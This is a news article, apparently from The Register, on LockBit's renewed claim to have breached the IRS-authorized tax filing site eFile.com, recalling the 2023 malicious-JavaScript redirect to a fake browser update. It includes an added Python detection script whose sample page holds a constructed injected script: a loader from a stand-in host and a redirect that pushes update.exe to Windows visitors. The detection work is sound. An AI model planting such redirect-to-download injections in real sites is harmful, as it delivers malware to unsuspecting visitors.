
Deja blues... LockBit boasts once again of ransoming IRS-authorized eFile.com

Add 'ransomware' to the list of certainties in life?


In an intriguing move, notorious ransomware gang LockBit claims once again to have compromised eFile.com, which offers online services for electronically filing tax returns with the US Internal Revenue Service (IRS).

To be clear: eFile.com is neither owned nor operated by the IRS, nor is it part of the agency's own e-file program, though it is an IRS-authorized e-file provider.

The Register has not verified the crooks' latest claims, and neither the dot-com nor the IRS immediately responded to The Register's inquiries about the alleged breach. We will update this story as we receive additional information.

If the criminals' boasts on their dark-web leak blog about the extortion turn out to be true, a lot of people's personal and financial data is potentially at risk, so it's a good idea to keep an eye out for any suspicious banking activity. The website is said to have 14 days to cough up the demanded ransom.

That all said, LockBit claimed to have compromised eFile.com in 2022. The gang may well just be re-posting on its blog its previous hit on the dot-com for clout or chaos, or may be trying to extract money from the victim all over again. We're checking that out.

Repeated target

We recall that in March 2023, eFile.com's website was compromised and used to deliver malware. That intrusion, about a month before America's tax day, was spotted by Reddit users who noted that when visiting eFile.com, they were redirected to a phony browser update page with a link to download and run a .exe file.

It turned out the redirection was caused by JavaScript maliciously added to the dot-com site, as confirmed by SANS Internet Storm Center founder Johannes Ullrich; visitors who were tricked into running the downloaded executable ended up with backdoored Windows PCs. eFile.com later removed the malicious code from its website.
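The kind of injection described above is exactly what a served-content baseline check is meant to catch: every script on the page is compared against what the site is known to ship. The following is an added example, not code from The Register, eFile.com, or the SANS ISC write-up. The allowlisted hosts (`www.example-tax-site.com`, `cdn.example-tax-site.com`), the redirect-style heuristics, and the "injected" snippet in `INJECTED_PAGE` are all constructed for illustration and are not the actual code found on eFile.com.

```python
"""Flag script content added to a web page beyond a known-good baseline.

Added example; the allowlist and sample pages below are constructed and
hypothetical, not the real eFile.com page or the real injected script.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hypothetical allowlist: hosts the site is known to load scripts from.
ALLOWED_SCRIPT_HOSTS = {"www.example-tax-site.com", "cdn.example-tax-site.com"}

# Heuristics for inline script that redirects visitors or pushes an executable.
SUSPICIOUS_INLINE = [
    re.compile(r"window\.location(\.href)?\s*=", re.I),
    re.compile(r"location\.replace\s*\(", re.I),
    re.compile(r"\.exe\b", re.I),
]


class ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies from HTML."""

    def __init__(self):
        super().__init__()
        self.external = []      # src attribute values
        self.inline = []        # bodies of <script> blocks without src
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._in_script = True
                self._buf = []

    def handle_data(self, data):
        # HTMLParser hands <script> contents over as raw CDATA.
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf))


def audit_page(html, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return (kind, detail) findings for scripts that deviate from baseline."""
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for src in collector.external:
        host = urlparse(src).netloc.lower()
        # Relative/same-origin URLs have an empty netloc and are left alone.
        if host and host not in allowed_hosts:
            findings.append(("external-script-unexpected-host", src))
    for body in collector.inline:
        for pattern in SUSPICIOUS_INLINE:
            if pattern.search(body):
                findings.append(("inline-script-suspicious", body.strip()[:80]))
                break
    return findings


# Constructed sample pages: a clean baseline and the same page with an
# injected redirect to a fake browser-update download (hypothetical hosts).
CLEAN_PAGE = """<html><head>
<script src="https://www.example-tax-site.com/js/app.js"></script>
<script src="/static/forms.js"></script>
</head><body><h1>File your return</h1></body></html>"""

INJECTED_PAGE = CLEAN_PAGE.replace(
    "</body>",
    '<script src="https://cdn.update-browser.example/loader.js"></script>'
    '<script>if(navigator.userAgent.indexOf("Windows")>-1){'
    'window.location.href="https://update-browser.example/update.exe";}</script>'
    "</body>",
)


if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE)):
        print(name, audit_page(page))
```

Run the script against a fetched copy of a page and a stored baseline; a non-empty result for a page that should not have changed is the signal to pull the served HTML and diff it, which is the step that surfaced the eFile.com injection once Reddit users reported the redirect.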

This latest talk of a compromise hits right as late tax filers, who were granted an extension by the IRS in April, scramble to submit their documents prior to the October 15 deadline.

And, of course, these claims come despite LockBit's ransomware operations being largely disrupted by global law enforcement earlier this year. While many of the gang's affiliates have moved on to greener pastures, or at least ones without as big a target painted on them, LockBit ransomware refuses to die.

According to Check Point's most recent monthly ransomware stats, LockBit3 ransomware was responsible for 8 percent of all infections in August, putting this particular strain in the No. 3 position behind RansomHub (15 percent) and Meow (9 percent). ®
